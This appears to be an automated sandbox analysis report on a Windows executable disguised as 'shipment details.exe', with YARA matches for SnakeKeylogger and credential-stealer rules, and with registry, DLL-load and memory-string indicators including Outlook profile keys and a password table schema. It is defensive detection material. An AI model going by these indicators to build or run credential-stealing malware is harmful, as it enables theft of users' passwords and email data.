Source: 0.2.shipment details.exe.5420000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.shipment details.exe.3b4ad70.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.shipment details.exe.5420000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.shipment details.exe.2b27b10.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.shipment details.exe.2b2a350.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 00000000.00000002.4523008463.0000000005420000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: shipment details.exe PID: 4788, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, DarkListView.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.shipment details.exe.5420000.6.raw.unpack, DarkListView.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, .cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, .cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, DarkComboBox.cs	Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
Source: 0.2.shipment details.exe.5420000.6.raw.unpack, DarkComboBox.cs	Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/0@4/3

Source: C:\Users\user\Desktop\shipment details.exe

Mutant created: NULL

Source: shipment details.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: shipment details.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\shipment details.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: shipment details.exe, 00000001.00000002.4520239872.0000000003059000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: shipment details.exe

ReversingLabs: Detection: 36%

Source: unknown	Process created: C:\Users\user\Desktop\shipment details.exe "C:\Users\user\Desktop\shipment details.exe"
Source: C:\Users\user\Desktop\shipment details.exe	Process created: C:\Users\user\Desktop\shipment details.exe "C:\Users\user\Desktop\shipment details.exe"
Source: C:\Users\user\Desktop\shipment details.exe	Process created: C:\Users\user\Desktop\shipment details.exe "C:\Users\user\Desktop\shipment details.exe"	Jump to behavior

Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\shipment details.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\shipment details.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\shipment details.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: shipment details.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: shipment details.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Source: shipment details.exe

Static PE information: 0x93CCF654 [Thu Jul 30 00:52:36 2048 UTC]

Source: C:\Users\user\Desktop\shipment details.exe

Code function: 1_2_06BD9233 push es; ret

1_2_06BD9244

Source: shipment details.exe

Static PE information: section name: .text entropy: 7.802547137134015

Source: C:\Users\user\Desktop\shipment details.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
